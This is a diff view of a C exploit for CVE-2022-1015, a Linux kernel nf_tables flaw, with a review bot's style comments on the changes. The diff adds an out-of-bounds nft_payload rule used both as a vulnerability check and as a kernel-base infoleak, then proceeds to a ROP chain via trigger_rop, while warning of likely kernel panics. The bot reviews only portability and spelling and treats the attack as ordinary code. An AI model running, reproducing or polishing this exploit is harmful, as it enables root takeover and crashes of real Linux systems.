| skipped 483 lines |
484 | 484 | | execve(new_argv[0], new_argv, envp); |
485 | 485 | | puts("Couldn't start unshare wrapper.."); |
486 | 486 | | puts("Recompile the exploit with an appropriate unshare path."); |
| 487 | + | exit(EXIT_FAILURE); |
487 | 488 | | } |
488 | 489 | | if (strcmp("EXPLOIT", argv[1])) { |
489 | 490 | | puts("[-] Something went wrong..."); |
| skipped 28 lines |
518 | 519 | | |
519 | 520 | | if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) { |
520 | 521 | | perror("Failed creating base chain rule"); |
521 | | - | puts("[+] Target is NOT vulnerable to CVE-2022-1015"); |
522 | 522 | | exit(EXIT_FAILURE); |
523 | 523 | | } |
| 524 | + | |
524 | 525 | | puts("[+] Created base chain rule"); |
525 | | - | puts("[+] Target IS vulnerable to CVE-2022-1015"); |
526 | | - | puts("[+] Type 'y' to try exploiting the target."); |
527 | | - | puts("!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!"); |
528 | 526 | | |
529 | | - | char a[4] = {}; |
530 | | - | read(0, a, 1); |
| 527 | + | // we need to make a rule first in order to replace it |
| 528 | + | // in our leaky rule creation. it's a bit of a hack but it works |
| 529 | + | // We can also use it to determine whether the system is vulnerable |
| 530 | + | // before actually exploiting. |
531 | 531 | | |
532 | | - | if (a[0] != 'y') { |
533 | | - | puts("Bye!"); |
534 | | - | exit(EXIT_SUCCESS); |
| 532 | + | struct vuln_expr_params v; |
| 533 | + | |
| 534 | + | // offset 0xca and len 0xff is OOB |
| 535 | + | if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) { |
| 536 | + | puts("[-] Something went horribly wrong..."); |
| 537 | + | exit(EXIT_FAILURE); |
535 | 538 | | } |
536 | 539 | | |
537 | | - | // we need to make it first in order to replace it |
538 | | - | // it's a bit of a hack but it works |
539 | 540 | | struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL); |
540 | | - | rule_add_immediate_verdict(aux_rule, NF_ACCEPT, NULL); |
| 541 | + | rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value); |
541 | 542 | | |
542 | 543 | | err = send_batch_request( |
543 | 544 | | nl, |
| skipped 3 lines |
547 | 548 | | ); |
548 | 549 | | |
549 | 550 | | if (err) { |
550 | | - | perror("Failed creating auxiliary chain rule"); |
| 551 | + | puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET); |
551 | 552 | | exit(EXIT_FAILURE); |
552 | 553 | | } |
553 | 554 | | |
554 | | - | puts("[+] Created auxilary chain's initial infoleak rule."); |
| 555 | + | puts("[+] Succesfully created rule with OOB nft_payload!"); |
| 556 | + | puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET); |
| 557 | + | puts("[+] Type 'y' to try exploiting the target."); |
| 558 | + | puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET); |
| 559 | + | |
| 560 | + | char a[4] = {}; |
| 561 | + | read(0, a, 1); |
| 562 | + | |
| 563 | + | if (a[0] != 'y') { |
| 564 | + | puts("Bye!"); |
| 565 | + | exit(EXIT_SUCCESS); |
| 566 | + | } |
555 | 567 | | |
556 | 568 | | #define SERVER_HOST "127.0.0.1" |
557 | 569 | | #define SERVER_PORT 9999 |
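Review bot: The added `char a[4] = {};` uses an empty initializer, which is only standard in C23 and a GCC extension under -std=c11; `char a[4] = {0};` is equivalent and portable. The `read(0, a, 1)` that follows discards its return value, which is only safe because `a` is zero-initialised so a failed or empty read falls into the "Bye!" branch — that deserves a one-line comment such as `// a failed read leaves a[0] == 0 and is treated as a 'no'`. Two string nits on the new side: "Succesfully" is misspelled, and the red NOT VULNERABLE message is prefixed "[+]" while the other failure paths in this file use "[-]". The enclosing function begins and ends outside this hunk.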
| skipped 13 lines |
571 | 583 | | uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff); |
572 | 584 | | uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET; |
573 | 585 | | |
574 | | - | printf("[+] Kernel base @ 0x%.16lx\n", kernel_base); |
575 | 586 | | |
| 587 | + | // If the kernel base isn't aligned we should probably not continue. |
576 | 588 | | if((kernel_base & 0xfffff) != 0) { |
577 | 589 | | puts("[-] Leak failed."); |
| 590 | + | puts("[-] Try changing offsets / lengths / chain types."); |
| 591 | + | puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP"); |
578 | 592 | | exit(EXIT_FAILURE); |
579 | 593 | | } |
580 | 594 | | |
| 595 | + | printf("[+] Kernel base @ 0x%.16lx\n", kernel_base); |
581 | 596 | | stop_listener(pid); |
582 | 597 | | struct unft_base_chain_param bp; |
583 | 598 | | bp.hook_num = NF_INET_LOCAL_IN; |
| skipped 14 lines |
598 | 613 | | trigger_rop(nl, kernel_base, &server, err); |
599 | 614 | | after_rop(); |
600 | 615 | | } |
| 616 | + | |